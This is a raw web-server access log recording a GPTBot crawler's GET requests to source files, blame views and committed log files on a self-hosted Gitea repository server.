git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/models.py?display=rendered" [Client 74.7.227.38] [Length 10968] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/models.py" -[17/Feb/2026:16:21:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/pyvenv.cfg?display=rendered" [Client 74.7.227.38] [Length 10973] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:16:21:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/database.py?display=source" [Client 74.7.227.38] [Length 12341] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/database.py" -[17/Feb/2026:16:21:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 11421] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:21:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 11390] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 11421] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 11421] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:21:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:16:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:16:21:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:16:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:16:21:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 2933] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:16:21:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 170071] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:16:21:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_access.log?display=rendered" [Client 74.7.227.38] [Length 10974] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:16:21:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_error.log?display=rendered" [Client 74.7.227.38] [Length 10942] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:16:21:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_access.log?display=source" [Client 74.7.227.38] [Length 15060] [Gzip 4.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:16:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 9998] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 9971] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:21:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 10000] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:21:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 9998] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:21:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 10472] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:21:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 10473] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:21:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 10473] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:21:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 10444] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:21:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:21:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:21:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:21:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:21:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_error.log?display=rendered" [Client 74.7.227.38] [Length 10971] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:16:21:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_error.log?display=source" [Client 74.7.227.38] [Length 14478] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:16:21:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_error.log?display=source" [Client 74.7.227.38] [Length 11649] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:16:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_stream_access.log?display=source" [Client 74.7.227.38] [Length 10957] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:16:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_access.log?display=source" [Client 74.7.227.38] [Length 20557] [Gzip 6.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:16:21:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_error.log?display=source" [Client 74.7.227.38] [Length 19741] [Gzip 7.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:16:21:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_stream_access.log?display=source" [Client 74.7.227.38] [Length 10986] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:16:21:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_stream_access.log?display=source" [Client 74.7.227.38] [Length 10989] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:16:21:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_access.log?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:16:21:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_error.log?display=rendered" [Client 74.7.227.38] [Length 10926] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:16:21:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_access.log?display=source" [Client 74.7.227.38] [Length 34925] [Gzip 9.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:16:21:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_access.log?display=rendered" [Client 74.7.227.38] [Length 10932] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:16:22:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13449] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:16:22:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 16097] [Gzip 9.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:16:22:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 16097] [Gzip 9.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:16:22:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:16:22:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13450] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:16:22:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 16095] [Gzip 9.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:16:22:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:16:22:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:16:22:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_error.log?display=source" [Client 74.7.227.38] [Length 20913] [Gzip 7.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:16:22:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_access.log?display=source" [Client 74.7.227.38] [Length 40928] [Gzip 9.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:16:22:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_stream_access.log?display=source" [Client 74.7.227.38] [Length 10983] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 